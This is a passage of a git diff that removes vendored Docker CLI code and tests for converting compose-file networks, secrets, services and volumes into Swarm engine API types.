-func NewNamespace(name string) Namespace {
-	return Namespace{name: name}
-}
-
-// AddStackLabel returns labels with the namespace label added
-func AddStackLabel(namespace Namespace, labels map[string]string) map[string]string {
-	if labels == nil {
-		labels = make(map[string]string)
-	}
-	labels[LabelNamespace] = namespace.name
-	return labels
-}
-
-type networkMap map[string]composetypes.NetworkConfig
-
-// Networks converts networks from the compose-file type to the engine API type
-func Networks(
-	namespace Namespace,
-	networks networkMap,
-	servicesNetworks map[string]struct{},
-) (map[string]types.NetworkCreate, []string) {
-	if networks == nil {
-		networks = make(map[string]composetypes.NetworkConfig)
-	}
-
-	externalNetworks := []string{}
-	result := make(map[string]types.NetworkCreate)
-
-	for internalName := range servicesNetworks {
-		network := networks[internalName]
-		if network.External.External {
-			externalNetworks = append(externalNetworks, network.External.Name)
-			continue
-		}
-
-		createOpts := types.NetworkCreate{
-			Labels:   AddStackLabel(namespace, network.Labels),
-			Driver:   network.Driver,
-			Options:  network.DriverOpts,
-			Internal: network.Internal,
-		}
-
-		if network.Ipam.Driver != "" || len(network.Ipam.Config) > 0 {
-			createOpts.IPAM = &networktypes.IPAM{}
-		}
-
-		if network.Ipam.Driver != "" {
-			createOpts.IPAM.Driver = network.Ipam.Driver
-		}
-		for _, ipamConfig := range network.Ipam.Config {
-			config := networktypes.IPAMConfig{
-				Subnet: ipamConfig.Subnet,
-			}
-			createOpts.IPAM.Config = append(createOpts.IPAM.Config, config)
-		}
-		result[internalName] = createOpts
-	}
-
-	return result, externalNetworks
-}
-
-// Secrets converts secrets from the Compose type to the engine API type
-func Secrets(namespace Namespace, secrets map[string]composetypes.SecretConfig) ([]swarm.SecretSpec, error) {
-	result := []swarm.SecretSpec{}
-	for name, secret := range secrets {
-		if secret.External.External {
-			continue
-		}
-
-		data, err := ioutil.ReadFile(secret.File)
-		if err != nil {
-			return nil, err
-		}
-
-		result = append(result, swarm.SecretSpec{
-			Annotations: swarm.Annotations{
-				Name:   namespace.Scope(name),
-				Labels: AddStackLabel(namespace, secret.Labels),
-			},
-			Data: data,
-		})
-	}
-	return result, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go
deleted file mode 100644
index f333d73fda..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go
+++ /dev/null
@@ -1,122 +0,0 @@
-package convert
-
-import (
-	"testing"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/network"
-	composetypes "github.com/docker/docker/cli/compose/types"
-	"github.com/docker/docker/pkg/testutil/assert"
-	"github.com/docker/docker/pkg/testutil/tempfile"
-)
-
-func TestNamespaceScope(t *testing.T) {
-	scoped := Namespace{name: "foo"}.Scope("bar")
-	assert.Equal(t, scoped, "foo_bar")
-}
-
-func TestAddStackLabel(t *testing.T) {
-	labels := map[string]string{
-		"something": "labeled",
-	}
-	actual := AddStackLabel(Namespace{name: "foo"}, labels)
-	expected := map[string]string{
-		"something":    "labeled",
-		LabelNamespace: "foo",
-	}
-	assert.DeepEqual(t, actual, expected)
-}
-
-func TestNetworks(t *testing.T) {
-	namespace := Namespace{name: "foo"}
-	source := networkMap{
-		"normal": composetypes.NetworkConfig{
-			Driver: "overlay",
-			DriverOpts: map[string]string{
-				"opt": "value",
-			},
-			Ipam: composetypes.IPAMConfig{
-				Driver: "driver",
-				Config: []*composetypes.IPAMPool{
-					{
-						Subnet: "10.0.0.0",
-					},
-				},
-			},
-			Labels: map[string]string{
-				"something": "labeled",
-			},
-		},
-		"outside": composetypes.NetworkConfig{
-			External: composetypes.External{
-				External: true,
-				Name:     "special",
-			},
-		},
-	}
-	expected := map[string]types.NetworkCreate{
-		"default": {
-			Labels: map[string]string{
-				LabelNamespace: "foo",
-			},
-		},
-		"normal": {
-			Driver: "overlay",
-			IPAM: &network.IPAM{
-				Driver: "driver",
-				Config: []network.IPAMConfig{
-					{
-						Subnet: "10.0.0.0",
-					},
-				},
-			},
-			Options: map[string]string{
-				"opt": "value",
-			},
-			Labels: map[string]string{
-				LabelNamespace: "foo",
-				"something":    "labeled",
-			},
-		},
-	}
-
-	serviceNetworks := map[string]struct{}{
-		"default": {},
-		"normal":  {},
-		"outside": {},
-	}
-	networks, externals := Networks(namespace, source, serviceNetworks)
-	assert.DeepEqual(t, networks, expected)
-	assert.DeepEqual(t, externals, []string{"special"})
-}
-
-func TestSecrets(t *testing.T) {
-	namespace := Namespace{name: "foo"}
-
-	secretText := "this is the first secret"
-	secretFile := tempfile.NewTempFile(t, "convert-secrets", secretText)
-	defer secretFile.Remove()
-
-	source := map[string]composetypes.SecretConfig{
-		"one": {
-			File:   secretFile.Name(),
-			Labels: map[string]string{"monster": "mash"},
-		},
-		"ext": {
-			External: composetypes.External{
-				External: true,
-			},
-		},
-	}
-
-	specs, err := Secrets(namespace, source)
-	assert.NilError(t, err)
-	assert.Equal(t, len(specs), 1)
-	secret := specs[0]
-	assert.Equal(t, secret.Name, "foo_one")
-	assert.DeepEqual(t, secret.Labels, map[string]string{
-		"monster":      "mash",
-		LabelNamespace: "foo",
-	})
-	assert.DeepEqual(t, secret.Data, []byte(secretText))
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service.go b/vendor/github.com/docker/docker/cli/compose/convert/service.go
deleted file mode 100644
index 4a5489562c..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/convert/service.go
+++ /dev/null
@@ -1,416 +0,0 @@
-package convert
-
-import (
-	"fmt"
-	"os"
-	"sort"
-	"time"
-
-	"github.com/docker/docker/api/types"
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/api/types/swarm"
-	servicecli "github.com/docker/docker/cli/command/service"
-	composetypes "github.com/docker/docker/cli/compose/types"
-	"github.com/docker/docker/client"
-	"github.com/docker/docker/opts"
-	runconfigopts "github.com/docker/docker/runconfig/opts"
-	"github.com/docker/go-connections/nat"
-)
-
-// Services from compose-file types to engine API types
-// TODO: fix secrets API so that SecretAPIClient is not required here
-func Services(
-	namespace Namespace,
-	config *composetypes.Config,
-	client client.SecretAPIClient,
-) (map[string]swarm.ServiceSpec, error) {
-	result := make(map[string]swarm.ServiceSpec)
-
-	services := config.Services
-	volumes := config.Volumes
-	networks := config.Networks
-
-	for _, service := range services {
-
-		secrets, err := convertServiceSecrets(client, namespace, service.Secrets, config.Secrets)
-		if err != nil {
-			return nil, err
-		}
-		serviceSpec, err := convertService(namespace, service, networks, volumes, secrets)
-		if err != nil {
-			return nil, err
-		}
-		result[service.Name] = serviceSpec
-	}
-
-	return result, nil
-}
-
-func convertService(
-	namespace Namespace,
-	service composetypes.ServiceConfig,
-	networkConfigs map[string]composetypes.NetworkConfig,
-	volumes map[string]composetypes.VolumeConfig,
-	secrets []*swarm.SecretReference,
-) (swarm.ServiceSpec, error) {
-	name := namespace.Scope(service.Name)
-
-	endpoint, err := convertEndpointSpec(service.Ports)
-	if err != nil {
-		return swarm.ServiceSpec{}, err
-	}
-
-	mode, err := convertDeployMode(service.Deploy.Mode, service.Deploy.Replicas)
-	if err != nil {
-		return swarm.ServiceSpec{}, err
-	}
-
-	mounts, err := Volumes(service.Volumes, volumes, namespace)
-	if err != nil {
-		// TODO: better error message (include service name)
-		return swarm.ServiceSpec{}, err
-	}
-
-	resources, err := convertResources(service.Deploy.Resources)
-	if err != nil {
-		return swarm.ServiceSpec{}, err
-	}
-
-	restartPolicy, err := convertRestartPolicy(
-		service.Restart, service.Deploy.RestartPolicy)
-	if err != nil {
-		return swarm.ServiceSpec{}, err
-	}
-
-	healthcheck, err := convertHealthcheck(service.HealthCheck)
-	if err != nil {
-		return swarm.ServiceSpec{}, err
-	}
-
-	networks, err := convertServiceNetworks(service.Networks, networkConfigs, namespace, service.Name)
-	if err != nil {
-		return swarm.ServiceSpec{}, err
-	}
-
-	var logDriver *swarm.Driver
-	if service.Logging != nil {
-		logDriver = &swarm.Driver{
-			Name:    service.Logging.Driver,
-			Options: service.Logging.Options,
-		}
-	}
-
-	serviceSpec := swarm.ServiceSpec{
-		Annotations: swarm.Annotations{
-			Name:   name,
-			Labels: AddStackLabel(namespace, service.Deploy.Labels),
-		},
-		TaskTemplate: swarm.TaskSpec{
-			ContainerSpec: swarm.ContainerSpec{
-				Image:           service.Image,
-				Command:         service.Entrypoint,
-				Args:            service.Command,
-				Hostname:        service.Hostname,
-				Hosts:           sortStrings(convertExtraHosts(service.ExtraHosts)),
-				Healthcheck:     healthcheck,
-				Env:             sortStrings(convertEnvironment(service.Environment)),
-				Labels:          AddStackLabel(namespace, service.Labels),
-				Dir:             service.WorkingDir,
-				User:            service.User,
-				Mounts:          mounts,
-				StopGracePeriod: service.StopGracePeriod,
-				TTY:             service.Tty,
-				OpenStdin:       service.StdinOpen,
-				Secrets:         secrets,
-			},
-			LogDriver:     logDriver,
-			Resources:     resources,
-			RestartPolicy: restartPolicy,
-			Placement: &swarm.Placement{
-				Constraints: service.Deploy.Placement.Constraints,
-			},
-		},
-		EndpointSpec: endpoint,
-		Mode:         mode,
-		Networks:     networks,
-		UpdateConfig: convertUpdateConfig(service.Deploy.UpdateConfig),
-	}
-
-	return serviceSpec, nil
-}
-
-func sortStrings(strs []string) []string {
-	sort.Strings(strs)
-	return strs
-}
-
-type byNetworkTarget []swarm.NetworkAttachmentConfig
-
-func (a byNetworkTarget) Len() int           { return len(a) }
-func (a byNetworkTarget) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
-func (a byNetworkTarget) Less(i, j int) bool { return a[i].Target < a[j].Target }
-
-func convertServiceNetworks(
-	networks map[string]*composetypes.ServiceNetworkConfig,
-	networkConfigs networkMap,
-	namespace Namespace,
-	name string,
-) ([]swarm.NetworkAttachmentConfig, error) {
-	if len(networks) == 0 {
-		return []swarm.NetworkAttachmentConfig{
-			{
-				Target:  namespace.Scope("default"),
-				Aliases: []string{name},
-			},
-		}, nil
-	}
-
-	nets := []swarm.NetworkAttachmentConfig{}
-	for networkName, network := range networks {
-		networkConfig, ok := networkConfigs[networkName]
-		if !ok {
-			return []swarm.NetworkAttachmentConfig{}, fmt.Errorf(
-				"service %q references network %q, which is not declared", name, networkName)
-		}
-		var aliases []string
-		if network != nil {
-			aliases = network.Aliases
-		}
-		target := namespace.Scope(networkName)
-		if networkConfig.External.External {
-			target = networkConfig.External.Name
-		}
-		nets = append(nets, swarm.NetworkAttachmentConfig{
-			Target:  target,
-			Aliases: append(aliases, name),
-		})
-	}
-
-	sort.Sort(byNetworkTarget(nets))
-
-	return nets, nil
-}
-
-// TODO: fix secrets API so that SecretAPIClient is not required here
-func convertServiceSecrets(
-	client client.SecretAPIClient,
-	namespace Namespace,
-	secrets []composetypes.ServiceSecretConfig,
-	secretSpecs map[string]composetypes.SecretConfig,
-) ([]*swarm.SecretReference, error) {
-	opts := []*types.SecretRequestOption{}
-	for _, secret := range secrets {
-		target := secret.Target
-		if target == "" {
-			target = secret.Source
-		}
-
-		source := namespace.Scope(secret.Source)
-		secretSpec := secretSpecs[secret.Source]
-		if secretSpec.External.External {
-			source = secretSpec.External.Name
-		}
-
-		uid := secret.UID
-		gid := secret.GID
-		if uid == "" {
-			uid = "0"
-		}
-		if gid == "" {
-			gid = "0"
-		}
-
-		opts = append(opts, &types.SecretRequestOption{
-			Source: source,
-			Target: target,
-			UID:    uid,
-			GID:    gid,
-			Mode:   os.FileMode(secret.Mode),
-		})
-	}
-
-	return servicecli.ParseSecrets(client, opts)
-}
-
-func convertExtraHosts(extraHosts map[string]string) []string {
-	hosts := []string{}
-	for host, ip := range extraHosts {
-		hosts = append(hosts, fmt.Sprintf("%s %s", ip, host))
-	}
-	return hosts
-}
-
-func convertHealthcheck(healthcheck *composetypes.HealthCheckConfig) (*container.HealthConfig, error) {
-	if healthcheck == nil {
-		return nil, nil
-	}
-	var (
-		err               error
-		timeout, interval time.Duration
-		retries           int
-	)
-	if healthcheck.Disable {
-		if len(healthcheck.Test) != 0 {
-			return nil, fmt.Errorf("test and disable can't be set at the same time")
-		}
-		return &container.HealthConfig{
-			Test: []string{"NONE"},
-		}, nil
-
-	}
-	if healthcheck.Timeout != "" {
-		timeout, err = time.ParseDuration(healthcheck.Timeout)
-		if err != nil {
-			return nil, err
-		}
-	}
-	if healthcheck.Interval != "" {
-		interval, err = time.ParseDuration(healthcheck.Interval)
-		if err != nil {
-			return nil, err
-		}
-	}
-	if healthcheck.Retries != nil {
-		retries = int(*healthcheck.Retries)
-	}
-	return &container.HealthConfig{
-		Test:     healthcheck.Test,
-		Timeout:  timeout,
-		Interval: interval,
-		Retries:  retries,
-	}, nil
-}
-
-func convertRestartPolicy(restart string, source *composetypes.RestartPolicy) (*swarm.RestartPolicy, error) {
-	// TODO: log if restart is being ignored
-	if source == nil {
-		policy, err := runconfigopts.ParseRestartPolicy(restart)
-		if err != nil {
-			return nil, err
-		}
-		switch {
-		case policy.IsNone():
-			return nil, nil
-		case policy.IsAlways(), policy.IsUnlessStopped():
-			return &swarm.RestartPolicy{
-				Condition: swarm.RestartPolicyConditionAny,
-			}, nil
-		case policy.IsOnFailure():
-			attempts := uint64(policy.MaximumRetryCount)
-			return &swarm.RestartPolicy{
-				Condition:   swarm.RestartPolicyConditionOnFailure,
-				MaxAttempts: &attempts,
-			}, nil
-		default:
-			return nil, fmt.Errorf("unknown restart policy: %s", restart)
-		}
-	}
-	return &swarm.RestartPolicy{
-		Condition:   swarm.RestartPolicyCondition(source.Condition),
-		Delay:       source.Delay,
-		MaxAttempts: source.MaxAttempts,
-		Window:      source.Window,
-	}, nil
-}
-
-func convertUpdateConfig(source *composetypes.UpdateConfig) *swarm.UpdateConfig {
-	if source == nil {
-		return nil
-	}
-	parallel := uint64(1)
-	if source.Parallelism != nil {
-		parallel = *source.Parallelism
-	}
-	return &swarm.UpdateConfig{
-		Parallelism:     parallel,
-		Delay:           source.Delay,
-		FailureAction:   source.FailureAction,
-		Monitor:         source.Monitor,
-		MaxFailureRatio: source.MaxFailureRatio,
-	}
-}
-
-func convertResources(source composetypes.Resources) (*swarm.ResourceRequirements, error) {
-	resources := &swarm.ResourceRequirements{}
-	var err error
-	if source.Limits != nil {
-		var cpus int64
-		if source.Limits.NanoCPUs != "" {
-			cpus, err = opts.ParseCPUs(source.Limits.NanoCPUs)
-			if err != nil {
-				return nil, err
-			}
-		}
-		resources.Limits = &swarm.Resources{
-			NanoCPUs:    cpus,
-			MemoryBytes: int64(source.Limits.MemoryBytes),
-		}
-	}
-	if source.Reservations != nil {
-		var cpus int64
-		if source.Reservations.NanoCPUs != "" {
-			cpus, err = opts.ParseCPUs(source.Reservations.NanoCPUs)
-			if err != nil {
-				return nil, err
-			}
-		}
-		resources.Reservations = &swarm.Resources{
-			NanoCPUs:    cpus,
-			MemoryBytes: int64(source.Reservations.MemoryBytes),
-		}
-	}
-	return resources, nil
-
-}
-
-type byPublishedPort []swarm.PortConfig
-
-func (a byPublishedPort) Len() int           { return len(a) }
-func (a byPublishedPort) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
-func (a byPublishedPort) Less(i, j int) bool { return a[i].PublishedPort < a[j].PublishedPort }
-
-func convertEndpointSpec(source []string) (*swarm.EndpointSpec, error) {
-	portConfigs := []swarm.PortConfig{}
-	ports, portBindings, err := nat.ParsePortSpecs(source)
-	if err != nil {
-		return nil, err
-	}
-
-	for port := range ports {
-		portConfigs = append(
-			portConfigs,
-			opts.ConvertPortToPortConfig(port, portBindings)...)
-	}
-
-	// Sorting to make sure these are always in the same order
-	sort.Sort(byPublishedPort(portConfigs))
-
-	return &swarm.EndpointSpec{Ports: portConfigs}, nil
-}
-
-func convertEnvironment(source map[string]string) []string {
-	var output []string
-
-	for name, value := range source {
-		output = append(output, fmt.Sprintf("%s=%s", name, value))
-	}
-
-	return output
-}
-
-func convertDeployMode(mode string, replicas *uint64) (swarm.ServiceMode, error) {
-	serviceMode := swarm.ServiceMode{}
-
-	switch mode {
-	case "global":
-		if replicas != nil {
-			return serviceMode, fmt.Errorf("replicas can only be used with replicated mode")
-		}
-		serviceMode.Global = &swarm.GlobalService{}
-	case "replicated", "":
-		serviceMode.Replicated = &swarm.ReplicatedService{Replicas: replicas}
-	default:
-		return serviceMode, fmt.Errorf("Unknown mode: %s", mode)
-	}
-	return serviceMode, nil
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go
deleted file mode 100644
index 2e614d730c..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go
+++ /dev/null
@@ -1,216 +0,0 @@
-package convert
-
-import (
-	"sort"
-	"strings"
-	"testing"
-	"time"
-
-	"github.com/docker/docker/api/types/container"
-	"github.com/docker/docker/api/types/swarm"
-	composetypes "github.com/docker/docker/cli/compose/types"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestConvertRestartPolicyFromNone(t *testing.T) {
-	policy, err := convertRestartPolicy("no", nil)
-	assert.NilError(t, err)
-	assert.Equal(t, policy, (*swarm.RestartPolicy)(nil))
-}
-
-func TestConvertRestartPolicyFromUnknown(t *testing.T) {
-	_, err := convertRestartPolicy("unknown", nil)
-	assert.Error(t, err, "unknown restart policy: unknown")
-}
-
-func TestConvertRestartPolicyFromAlways(t *testing.T) {
-	policy, err := convertRestartPolicy("always", nil)
-	expected := &swarm.RestartPolicy{
-		Condition: swarm.RestartPolicyConditionAny,
-	}
-	assert.NilError(t, err)
-	assert.DeepEqual(t, policy, expected)
-}
-
-func TestConvertRestartPolicyFromFailure(t *testing.T) {
-	policy, err := convertRestartPolicy("on-failure:4", nil)
-	attempts := uint64(4)
-	expected := &swarm.RestartPolicy{
-		Condition:   swarm.RestartPolicyConditionOnFailure,
-		MaxAttempts: &attempts,
-	}
-	assert.NilError(t, err)
-	assert.DeepEqual(t, policy, expected)
-}
-
-func TestConvertEnvironment(t *testing.T) {
-	source := map[string]string{
-		"foo": "bar",
-		"key": "value",
-	}
-	env := convertEnvironment(source)
-	sort.Strings(env)
-	assert.DeepEqual(t, env, []string{"foo=bar", "key=value"})
-}
-
-func TestConvertResourcesFull(t *testing.T) {
-	source := composetypes.Resources{
-		Limits: &composetypes.Resource{
-			NanoCPUs:    "0.003",
-			MemoryBytes: composetypes.UnitBytes(300000000),
-		},
-		Reservations: &composetypes.Resource{
-			NanoCPUs:    "0.002",
-			MemoryBytes: composetypes.UnitBytes(200000000),
-		},
-	}
-	resources, err := convertResources(source)
-	assert.NilError(t, err)
-
-	expected := &swarm.ResourceRequirements{
-		Limits: &swarm.Resources{
-			NanoCPUs:    3000000,
-			MemoryBytes: 300000000,
-		},
-		Reservations: &swarm.Resources{
-			NanoCPUs:    2000000,
-			MemoryBytes: 200000000,
-		},
-	}
-	assert.DeepEqual(t, resources, expected)
-}
-
-func TestConvertResourcesOnlyMemory(t *testing.T) {
-	source := composetypes.Resources{
-		Limits: &composetypes.Resource{
-			MemoryBytes: composetypes.UnitBytes(300000000),
-		},
-		Reservations: &composetypes.Resource{
-			MemoryBytes: composetypes.UnitBytes(200000000),
-		},
-	}
-	resources, err := convertResources(source)
-	assert.NilError(t, err)
-
-	expected := &swarm.ResourceRequirements{
-		Limits: &swarm.Resources{
-			MemoryBytes: 300000000,
-		},
-		Reservations: &swarm.Resources{
-			MemoryBytes: 200000000,
-		},
-	}
-	assert.DeepEqual(t, resources, expected)
-}
-
-func TestConvertHealthcheck(t *testing.T) {
-	retries := uint64(10)
-	source := &composetypes.HealthCheckConfig{
-		Test:     []string{"EXEC", "touch", "/foo"},
-		Timeout:  "30s",
-		Interval: "2ms",
-		Retries:  &retries,
-	}
-	expected := &container.HealthConfig{
-		Test:     source.Test,
-		Timeout:  30 * time.Second,
-		Interval: 2 * time.Millisecond,
-		Retries:  10,
-	}
-
-	healthcheck, err := convertHealthcheck(source)
-	assert.NilError(t, err)
-	assert.DeepEqual(t, healthcheck, expected)
-}
-
-func TestConvertHealthcheckDisable(t *testing.T) {
-	source := &composetypes.HealthCheckConfig{Disable: true}
-	expected := &container.HealthConfig{
-		Test: []string{"NONE"},
-	}
-
-	healthcheck, err := convertHealthcheck(source)
-	assert.NilError(t, err)
-	assert.DeepEqual(t, healthcheck, expected)
-}
-
-func TestConvertHealthcheckDisableWithTest(t *testing.T) {
-	source := &composetypes.HealthCheckConfig{
-		Disable: true,
-		Test:    []string{"EXEC", "touch"},
-	}
-	_, err := convertHealthcheck(source)
-	assert.Error(t, err, "test and disable can't be set")
-}
-
-func TestConvertServiceNetworksOnlyDefault(t *testing.T) {
-	networkConfigs := networkMap{}
-	networks := map[string]*composetypes.ServiceNetworkConfig{}
-
-	configs, err := convertServiceNetworks(
-		networks, networkConfigs, NewNamespace("foo"), "service")
-
-	expected := []swarm.NetworkAttachmentConfig{
-		{
-			Target:  "foo_default",
-			Aliases: []string{"service"},
-		},
-	}
-
-	assert.NilError(t, err)
-	assert.DeepEqual(t, configs, expected)
-}
-
-func TestConvertServiceNetworks(t *testing.T) {
-	networkConfigs := networkMap{
-		"front": composetypes.NetworkConfig{
-			External: composetypes.External{
-				External: true,
-				Name:     "fronttier",
-			},
-		},
-		"back": composetypes.NetworkConfig{},
-	}
-	networks := map[string]*composetypes.ServiceNetworkConfig{
-		"front": {
-			Aliases: []string{"something"},
-		},
-		"back": {
-			Aliases: []string{"other"},
-		},
-	}
-
-	configs, err := convertServiceNetworks(
-		networks, networkConfigs, NewNamespace("foo"), "service")
-
-	expected := []swarm.NetworkAttachmentConfig{
-		{
-			Target:  "foo_back",
-			Aliases: []string{"other", "service"},
-		},
-		{
-			Target:  "fronttier",
-			Aliases: []string{"something", "service"},
-		},
-	}
-
-	sortedConfigs := byTargetSort(configs)
-	sort.Sort(&sortedConfigs)
-
-	assert.NilError(t, err)
-	assert.DeepEqual(t, []swarm.NetworkAttachmentConfig(sortedConfigs), expected)
-}
-
-type byTargetSort []swarm.NetworkAttachmentConfig
-
-func (s byTargetSort) Len() int {
-	return len(s)
-}
-
-func (s byTargetSort) Less(i, j int) bool {
-	return strings.Compare(s[i].Target, s[j].Target) < 0
-}
-
-func (s byTargetSort) Swap(i, j int) {
-	s[i], s[j] = s[j], s[i]
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume.go b/vendor/github.com/docker/docker/cli/compose/convert/volume.go
deleted file mode 100644
index 24442d4dc7..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/convert/volume.go
+++ /dev/null
@@ -1,128 +0,0 @@
-package convert
-
-import (
-	"fmt"
-	"strings"
-
-	"github.com/docker/docker/api/types/mount"
-	composetypes "github.com/docker/docker/cli/compose/types"
-)
-
-type volumes map[string]composetypes.VolumeConfig
-
-// Volumes from compose-file types to engine api types
-func Volumes(serviceVolumes []string, stackVolumes volumes, namespace Namespace) ([]mount.Mount, error) {
-	var mounts []mount.Mount
-
-	for _, volumeSpec := range serviceVolumes {
-		mount, err := convertVolumeToMount(volumeSpec, stackVolumes, namespace)
-		if err != nil {
-			return nil, err
-		}
-		mounts = append(mounts, mount)
-	}
-	return mounts, nil
-}
-
-func convertVolumeToMount(volumeSpec string, stackVolumes volumes, namespace Namespace) (mount.Mount, error) {
-	var source, target string
-	var mode []string
-
-	// TODO: split Windows path mappings properly
-	parts := strings.SplitN(volumeSpec, ":", 3)
-
-	for _, part := range parts {
-		if strings.TrimSpace(part) == "" {
-			return mount.Mount{}, fmt.Errorf("invalid volume: %s", volumeSpec)
-		}
-	}
-
-	switch len(parts) {
-	case 3:
-		source = parts[0]
-		target = parts[1]
-		mode = strings.Split(parts[2], ",")
-	case 2:
-		source = parts[0]
-		target = parts[1]
-	case 1:
-		target = parts[0]
-	}
-
-	if source == "" {
-		// Anonymous volume
-		return mount.Mount{
-			Type:   mount.TypeVolume,
-			Target: target,
-		}, nil
-	}
-
-	// TODO: catch Windows paths here
-	if strings.HasPrefix(source, "/") {
-		return mount.Mount{
-			Type:        mount.TypeBind,
-			Source:      source,
-			Target:      target,
-			ReadOnly:    isReadOnly(mode),
-			BindOptions: getBindOptions(mode),
-		}, nil
-	}
-
-	stackVolume, exists := stackVolumes[source]
-	if !exists {
-		return mount.Mount{}, fmt.Errorf("undefined volume: %s", source)
-	}
-
-	var volumeOptions *mount.VolumeOptions
-	if stackVolume.External.Name != "" {
-		source = stackVolume.External.Name
-	} else {
-		volumeOptions = &mount.VolumeOptions{
-			Labels: AddStackLabel(namespace, stackVolume.Labels),
-			NoCopy: isNoCopy(mode),
-		}
-
-		if stackVolume.Driver != "" {
-			volumeOptions.DriverConfig = &mount.Driver{
-				Name:    stackVolume.Driver,
-				Options: stackVolume.DriverOpts,
-			}
-		}
-		source = namespace.Scope(source)
-	}
-	return mount.Mount{
-		Type:          mount.TypeVolume,
-		Source:        source,
-		Target:        target,
-		ReadOnly:      isReadOnly(mode),
-		VolumeOptions: volumeOptions,
-	}, nil
-}
-
-func modeHas(mode []string, field string) bool {
-	for _, item := range mode {
-		if item == field {
-			return true
-		}
-	}
-	return false
-}
-
-func isReadOnly(mode []string) bool {
-	return modeHas(mode, "ro")
-}
-
-func isNoCopy(mode []string) bool {
-	return modeHas(mode, "nocopy")
-}
-
-func getBindOptions(mode []string) *mount.BindOptions {
-	for _, item := range mode {
-		for _, propagation := range mount.Propagations {
-			if mount.Propagation(item) == propagation {
-				return &mount.BindOptions{Propagation: mount.Propagation(item)}
-			}
-		}
-	}
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go b/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go
deleted file mode 100644
index 113ab1e1b6..0000000000
--- a/vendor/github.com/docker/docker/cli/compose/convert/volume_test.go
+++ /dev/null
@@ -1,133 +0,0 @@
-package convert
-
-import (
-	"testing"
-
-	"github.com/docker/docker/api/types/mount"
-	composetypes "github.com/docker/docker/cli/compose/types"
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestIsReadOnly(t *testing.T) {
-	assert.Equal(t, isReadOnly([]string{"foo", "bar", "ro"}), true)
-	assert.Equal(t, isReadOnly([]string{"ro"}), true)
-	assert.Equal(t, isReadOnly([]string{}), false)
-	assert.Equal(t, isReadOnly([]string{"foo", "rw"}), false)
-	assert.Equal(t, isReadOnly([]string{"foo"}), false)
-}
-
-func TestIsNoCopy(t *testing.T) {
-	assert.Equal(t, isNoCopy([]string{"foo", "bar", "nocopy"}), true)
-	assert.Equal(t, isNoCopy([]string{"nocopy"}), true)
-	assert.Equal(t, isNoCopy([]string{}), false)
-	assert.Equal(t, isNoCopy([]string{"foo", "rw"}), false)
-}
-
-func TestGetBindOptions(t *testing.T) {
-	opts := getBindOptions([]string{"slave"})
-	expected := mount.BindOptions{Propagation: mount.PropagationSlave}
-	assert.Equal(t, *opts, expected)
-}
-
-func TestGetBindOptionsNone(t *testing.T) {
-	opts := getBindOptions([]string{"ro"})
-	assert.Equal(t, opts, (*mount.BindOptions)(nil))
-}
-
-func TestConvertVolumeToMountNamedVolume(t *testing.T) {
-	stackVolumes := volumes{
-		"normal": composetypes.VolumeConfig{
-			Driver: "glusterfs",
-			DriverOpts: map[string]string{
-				"opt": "value",
-			},
-			Labels: map[string]string{
-				"something": "labeled",
-			},
-		},
-	}
-	namespace := NewNamespace("foo")
-	expected := mount.Mount{
-		Type:     mount.TypeVolume,
-		Source:   "foo_normal",
-		Target:   "/foo",
-		ReadOnly: true,
-		VolumeOptions: &mount.VolumeOptions{
-			Labels: map[string]string{
-				LabelNamespace: "foo",
-				"something":    "labeled",
-			},
-			DriverConfig: &mount.Driver{
-				Name: "glusterfs",
-				Options: map[string]string{
-					"opt": "value",
-				},
-			},
-		},
-	}
-	mount, err := convertVolumeToMount("normal:/foo:ro", stackVolumes, namespace)
-	assert.NilError(t, err)
-	assert.DeepEqual(t, mount, expected)
-}
-
-func TestConvertVolumeToMountNamedVolumeExternal(t *testing.T) {
-	stackVolumes := volumes{
-		"outside": composetypes.VolumeConfig{
-			External: composetypes.External{
-				External: true,
-				Name:     "special",
-			},
-		},
-	}
-	namespace := NewNamespace("foo")
-	expected := mount.Mount{
-		Type:   mount.TypeVolume,
-		Source: "special",
-		Target: "/foo",
-	}
-	mount, err := convertVolumeToMount("outside:/foo", stackVolumes, namespace)
-	assert.NilError(t, err)
-	assert.DeepEqual(t, mount, expected)
-}
-
-func TestConvertVolumeToMountBind(t *testing.T) {
-	stackVolumes := volumes{}
-	namespace := NewNamespace("foo")
-	expected := mount.Mount{
-		Type:        mount.TypeBind,
-		Source:      "/bar",
-		Target:      "/foo",
-		ReadOnly:    true,
-		BindOptions: &mount.BindOptions{Propagation: mount.PropagationShared},
-	}
-	mount, err := convertVolumeToMount("/bar:/foo:ro,shared", stackVolumes, namespace)
-	assert.NilError(t, err)
-	assert.DeepEqual(t, mount, expected)
-}
-
-func TestConvertVolumeToMountVolumeDoesNotExist(t *testing.T) {
-	namespace := NewNamespace("foo")
-	_, err := convertVolumeToMount("unknown:/foo:ro", volumes{}, namespace)
-	assert.Error(t, err, "undefined volume: unknown")
-}
-
-func TestConvertVolumeToMountAnonymousVolume(t *testing.T) {
-	stackVolumes := map[string]composetypes.VolumeConfig{}
-	namespace := NewNamespace("foo")
-	expected := mount.Mount{
-		Type:   mount.TypeVolume,
-		Target: "/foo/bar",
-	}
-	mnt, err := convertVolumeToMount("/foo/bar", stackVolumes, namespace)
-	assert.NilError(t, err)
-	assert.DeepEqual(t, mnt, expected)
-}
-
-func TestConvertVolumeToMountInvalidFormat(t *testing.T) {
-	namespace := NewNamespace("foo")
-	invalids := []string{"::", "::cc", ":bb:", "aa::", "aa::cc", "aa:bb:", " : : ", " : :cc", " :bb: ", "aa: : ", "aa: :cc", "aa:bb: "}
